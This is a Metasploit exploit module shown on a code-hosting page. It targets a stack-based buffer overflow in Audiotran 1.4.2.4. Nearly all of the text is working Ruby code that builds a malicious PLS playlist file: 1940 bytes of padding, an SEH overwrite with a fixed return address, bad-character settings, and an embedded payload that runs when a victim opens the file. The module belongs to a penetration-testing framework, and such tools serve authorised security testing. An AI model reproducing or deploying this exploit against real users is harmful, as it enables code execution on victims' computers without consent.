CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audiotran_pls_1424.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(update_info(info,
14
'Name' => 'Audiotran PLS File Stack Buffer Overflow',
15
'Description' => %q{
16
This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
17
An attacker must send the file to victim and the victim must open the file.
18
Alternatively, it may be possible to execute code remotely via an embedded
19
PLS file within a browser when the PLS extension is registered to Audiotran.
20
This alternate vector has not been tested and cannot be exercised directly
21
with this module.
22
},
23
'License' => MSF_LICENSE,
24
'Author' =>
25
[
26
'Philip OKeefe',
27
],
28
'References' =>
29
[
30
[ 'EDB', '14961' ]
31
],
32
'Payload' =>
33
{
34
'Space' => 5000,
35
'BadChars' => "\x00\x0a\x0d\x3d",
36
'StackAdjustment' => -3500,
37
},
38
'Platform' => 'win',
39
'Targets' =>
40
[
41
[ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r from amp3dj.ocx
42
],
43
'Privileged' => false,
44
'DisclosureDate' => '2010-09-09',
45
'DefaultTarget' => 0))
46
47
register_options(
48
[
49
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
50
])
51
end
52
53
def exploit
54
sploit = "[playlist]\r\nFile1="
55
sploit << rand_text_alpha_upper(1940)
56
sploit << generate_seh_payload(target.ret)
57
print_status("Creating '#{datastore['FILENAME']}' file ...")
58
file_create(sploit)
59
end
60
end
61
62